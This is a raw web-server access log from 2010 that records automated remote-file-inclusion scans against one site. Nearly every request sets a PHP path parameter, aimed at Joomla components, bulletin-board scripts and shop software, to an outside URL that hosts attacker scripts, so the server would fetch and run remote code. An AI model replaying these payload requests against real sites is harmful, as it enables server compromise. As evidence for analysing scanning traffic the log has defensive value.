210.127.209.105 - - [24/Feb/2010:06:26:28 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
189.14.103.146 - - [24/Feb/2010:06:27:15 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.14.103.146 - - [24/Feb/2010:06:27:18 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.14.103.146 - - [24/Feb/2010:06:27:19 -0800] "GET /logs/access_100218.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:28:52 -0800] "GET /logs/access_100218.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:28:52 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:28:52 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:29:25 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:29:41 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:06:30:55 -0800] "GET /logs/access_100120.log%20%20/language=0&lang_settings[0][1]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:30:59 -0800] "GET /logs/access_100217.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:06:31:35 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:06:31:36 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:32:04 -0800] "GET /mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:32:04 -0800] "GET /logs/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:32:04 -0800] "GET /logs/access_100208.log%20%20/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:06:32:20 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:06:32:20 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:32:47 -0800] "GET /logs/access_100204.log%20%20/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:32:57 -0800] "GET /mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:32:57 -0800] "GET /logs/access_100204.log%20%20/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:32:57 -0800] "GET /logs/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.152.246 - - [24/Feb/2010:06:32:58 -0800] "GET /logs/access_100218.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:33:11 -0800] "GET /mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:33:13 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:33:16 -0800] "GET /logs/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:33:21 -0800] "GET /logs/access_100204.log%20%20/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:33:41 -0800] "GET /logs/access_100208.log%20%20/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:33:46 -0800] "GET /logs/access_100208.log%20%20/mvcw.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:36:06 -0800] "GET /logs/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:36:06 -0800] "GET /logs/access_100121.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:36:07 -0800] "GET /index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
189.14.103.146 - - [24/Feb/2010:06:36:41 -0800] "GET /logs/access_100218.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:37:36 -0800] "GET /logs/access_100219.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [24/Feb/2010:06:38:57 -0800] "GET /logs/access_100215.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.152.246 - - [24/Feb/2010:06:39:49 -0800] "GET /logs/access_100215.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:42:21 -0800] "GET /logs/access_100219.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:42:21 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:42:21 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
189.14.103.146 - - [24/Feb/2010:06:44:45 -0800] "GET /logs/access_100215.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:45:17 -0800] "GET /logs/access_100121.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:45:17 -0800] "GET /logs/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:45:17 -0800] "GET /index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:46:24 -0800] "GET /logs/access_100122.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:46:25 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:46:26 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:46:30 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:46:55 -0800] "GET /logs/access_100219.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:49:12 -0800] "GET /logs/access_100126.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:49:12 -0800] "GET /logs/access_100201.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:49:22 -0800] "GET /logs/access_100119.log//include/admin.lib.inc.php?site_path=http://www.milsasia.com//data/cms/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.216.33 - - [24/Feb/2010:06:50:23 -0800] "GET /logs/access_081023.log HTTP/1.1" 404 5258 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:50:58 -0800] "GET /logs/access_100123.log//include/admin.lib.inc.php?site_path=http://www.milsasia.com//data/cms/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:52:55 -0800] "GET /components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:52:55 -0800] "GET /logs/access_100217.log%20%20/components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:52:56 -0800] "GET /logs/components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:52:58 -0800] "GET /logs/components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:52:58 -0800] "GET /components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:52:58 -0800] "GET /logs/access_100217.log%20%20/components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:06:53:30 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:06:53:30 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:06:53:33 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:54:23 -0800] "GET /logs/access_091220.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:56:13 -0800] "GET /logs/access_100201.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:56:14 -0800] "GET /logs/access_100126.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:57:52 -0800] "GET /logs/access_100201.log%20%20/activecontent.php?vsDragonRootPath=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:57:52 -0800] "GET /logs/activecontent.php?vsDragonRootPath=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:57:52 -0800] "GET /activecontent.php?vsDragonRootPath=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:58:08 -0800] "GET /logs/access_100207.log%20%20/activecontent.php?vsDragonRootPath=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:58:19 -0800] "GET /logs/access_100212.log%20%20/components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:06:58:25 -0800] "GET /logs/access_100212.log%20%20/components/com_phpshop/member.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:06:59:02 -0800] "GET /logs//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:06:59:02 -0800] "GET /component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:06:59:09 -0800] "GET /logs/access_100217.log%20%20//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:06:59:42 -0800] "GET /logs/access_100208.log%20%20//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:00:35 -0800] "GET /index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:00:42 -0800] "GET /logs/access_100123.log/index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:00:42 -0800] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:00:48 -0800] "GET /component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:00:48 -0800] "GET /logs//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:00:55 -0800] "GET /logs/access_100217.log%20%20//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:01:22 -0800] "GET /logs//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:01:22 -0800] "GET /component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:01:28 -0800] "GET /logs/access_100217.log%20%20//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:01:28 -0800] "GET /logs/access_100208.log%20%20//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:02:01 -0800] "GET /logs/access_100121.log/index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:07:02:01 -0800] "GET /logs/access_100208.log%20%20//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:03:51 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:03:51 -0800] "GET /write_update.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:03:51 -0800] "GET /logs//write_update.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:07:04:41 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:07:04:58 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:07:05:16 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:07:05:32 -0800] "GET /logs//errors.php?error=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:07:05:32 -0800] "GET /errors.php?error=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:07:05:32 -0800] "GET /logs/access_100123.log%20%20//errors.php?error=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [24/Feb/2010:07:08:11 -0800] "GET /logs/access_100103.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:07:08:13 -0800] "GET /logs/access_100201.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:07:08:13 -0800] "GET /logs/access_100126.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:07:08:28 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:08:31 -0800] "GET /errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:08:31 -0800] "GET /logs/access_100123.log/errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:08:33 -0800] "GET /logs/errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:07:09:01 -0800] "GET /logs/access_100217.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:10:50 -0800] "GET /logs/errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:10:50 -0800] "GET /errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:07:10:50 -0800] "GET /logs/access_100123.log/errors.php?error=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:07:10:51 -0800] "GET /logs/access_100205.log%20%20//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:07:10:51 -0800] "GET /bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
